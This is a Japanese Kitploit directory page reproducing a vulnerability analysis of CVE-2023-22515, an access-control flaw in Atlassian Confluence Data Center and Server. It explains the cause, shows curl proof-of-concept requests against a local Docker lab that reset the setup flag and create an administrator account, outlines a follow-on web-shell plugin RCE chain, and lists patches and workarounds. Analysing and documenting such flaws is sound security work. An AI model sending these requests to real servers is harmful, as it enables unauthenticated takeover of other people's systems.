Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-22515 — CVE-2023-22515の詳細な分析と概念実証エクスプロイト。Atlassian Confluence Data CenterおよびServerにおける重大なアクセス制御の脆弱性で、認証不要の管理者アカウント作成と潜在的なリモートコード実行を可能にします。 | Kitploit
ツール/GitHubGitHub/dkq-k/cve-2023-22515
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育レッドチーミング
GitHubdkq-k/cve-2023-22515

CVE-2023-22515

CVE-2023-22515の詳細な分析と概念実証エクスプロイト。Atlassian Confluence Data CenterおよびServerにおける重大なアクセス制御の脆弱性で、認証不要の管理者アカウント作成と潜在的なリモートコード実行を可能にします。

リポジトリを見る
7ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-22515: Confluence Data Center & Server 権限昇格脆弱性分析レポート

1. 概要 (Overview)

CVE-2023-22515 は、Atlassian Confluence Data Center および Server 製品で発見された深刻な (Critical) Broken Access Control 脆弱性です。攻撃者は認証されていない状態でリモートからサーバーの初期設定プロセスを再活性化し、それによって新しい管理者アカウントを作成してシステムを完全に掌握できます。

  • CVE ID: CVE-2023-22515
  • CVSS Score: 10.0 (Critical)
  • 影響を受けるバージョン: 8.0.0 ~ 8.5.1 (一部のバージョンを除く)

2. 脆弱性詳細分析 (Vulnerability Analysis)

原因 (Root Cause)

この脆弱性の核心は、XWork2 フレームワークのパラメータバインディングメカニズムと Confluence のアクション (Action) 処理ロジック間の不十分な検証にあります。

攻撃者は URL パラメータを介して bootstrapStatusProvider.applicationConfig.setupComplete の値を false に操作できます。この属性は、Confluence がインストールおよび設定を完了したかどうかを判断する重要なフラグです。

root@kitploit:~
GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1
Host: <target-ip>

上記のリクエストを送信すると、サーバーはメモリ上で設定が完了していない状態であると認識します。これは永続的な設定ファイル (confluence.cfg.xml) を変更するものではありませんが、ランタイム中に状態を変更することでアクセス制御をバイパスできるようにします。

攻撃メカニズム (Attack Mechanism)

  1. 設定状態の初期化: 攻撃者は /server-info.action などの公開エンドポイントにアクセスし、bootstrapStatusProvider.applicationConfig.setupComplete=false パラメータを渡します。
  2. アクセス制御のバイパス: サーバーは自分自身を「インストール中」の状態と認識するため、/setup/* 以下の管理者設定ページへのアクセス制限が解除されます。
  3. 管理者アカウントの作成: 攻撃者は /setup/setupadministrator.action ページにアクセスし、新しいシステム管理者 (System Administrator) アカウントを作成します。
  4. システムの掌握: 作成した管理者アカウントでログインし、システムのすべての権限を取得します。これにより、Web シェルのアップロード、データ漏洩、ランサムウェアの展開などのさらなる悪意のある行為が可能になります。

3. 脆弱性の再現 (Reproduction)

環境構築 (Environment Setup)

Docker を使用して脆弱なバージョン (8.5.1) の Confluence Server を構築しました。

  • Docker Image: atlassian/confluence-server:8.5.1
  • Database: PostgreSQL 14

docker-compose.yml (概要):

root@kitploit:~
services:
  confluence:
    image: atlassian/confluence-server:8.5.1
    ports:
      - "8090:8090"
    environment:
      - ATL_DB_TYPE=postgresql
      # ... DB 設定 ...

Exploit の実行 (Exploitation)

Python の依存関係問題を避けるため、curl を使用した Bash スクリプトで PoC を作成し実行しました。

Exploit Flow:

  1. Reset Setup Status:

    root@kitploit:~
    curl -v "http://localhost:8090/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false"
    

    結果: HTTP 302 リダイレクト応答が返され、内部的に設定完了状態が解除されたことを確認しました。

  2. Create Administrator:

    root@kitploit:~
    curl -X POST "http://localhost:8090/setup/setupadministrator.action" \
      -H "X-Atlassian-Token: no-check" \
      --data "username=hacked_admin&password=p@ssw0rd123&..."
    

    結果: このリクエストにより hacked_admin アカウントの作成を試み、その後ログインページでそのアカウントでアクセス可能になりました。

4. 対応策 (Mitigation)

パッチ適用 (Patch)

Atlassian が提供する最新バージョンに直ちにアップグレードする必要があります。

  • Fixed Versions: 8.3.3, 8.4.3, 8.5.2 以降

一時的な緩和策 (Workaround)

パッチが適用できない場合、/setup/* エンドポイントへのアクセスをネットワークレベル (ロードバランサー、WAF、リバースプロキシなど) でブロックする必要があります。

  • ブロック対象 URL: /setup/*

6. 高度な攻撃: RCE (Remote Code Execution) シナリオ

CVE-2023-22515 を介して管理者権限を取得した攻撃者は、システムコマンドを実行 (RCE) する段階に進むことができます。

概要

Confluence は管理者にプラグイン (Add-on) のインストール権限を提供します。攻撃者はこれを悪用して、Web シェル (Web Shell) 機能を含む悪意のあるプラグインをアップロードすることで、サーバーオペレーティングシステムに対する制御権を取得できます。

攻撃チェーン (Attack Chain)

  1. 管理者アカウントの作成 (CVE-2023-22515): 前述の方法でシステム管理者権限を取得
  2. 設定完了トリック: サーバーが 'Setup Mode' に拘束されている場合、/setup/finishsetup.action などを介して強制的に設定を完了する (ライセンスバイパスが必要) か、既存のセッションを使用してアクセス可能な管理者メニューを探索
  3. 悪意のあるプラグインのアップロード:
    • メニュー: Confluence Administration -> Manage Apps -> Upload App
    • ファイル: 悪意のある Java クラスファイルが含まれた .jar ファイル
  4. コマンド実行:
    • アップロードされたプラグインが提供する URL (例: /plugins/servlet/webshell?cmd=id) にアクセスしてシステムコマンドを実行

現在の再現環境の限界

本実習環境 (Docker) は有効な Confluence ライセンスがないため、初期設定 (Setup) 段階を完了できません。そのため、管理者アカウント作成リクエストは成功 (302 Redirect) しましたが、その後のプラグインメニューへのアクセスおよび実際の RCE 実行は制限されました。実際の運用環境ではライセンスが登録されているため、このような制限なしに即座に RCE が可能です。

7. 結論 (Conclusion)

CVE-2023-22515 は、認証なしで管理者権限を取得できる非常に危険な脆弱性です。単に URL パラメータを操作するだけで攻撃が可能であり、攻撃難易度は非常に低いです。したがって、該当バージョンを使用する組織は直ちにパッチまたは緩和策を適用する必要があります。

ツールをダウンロード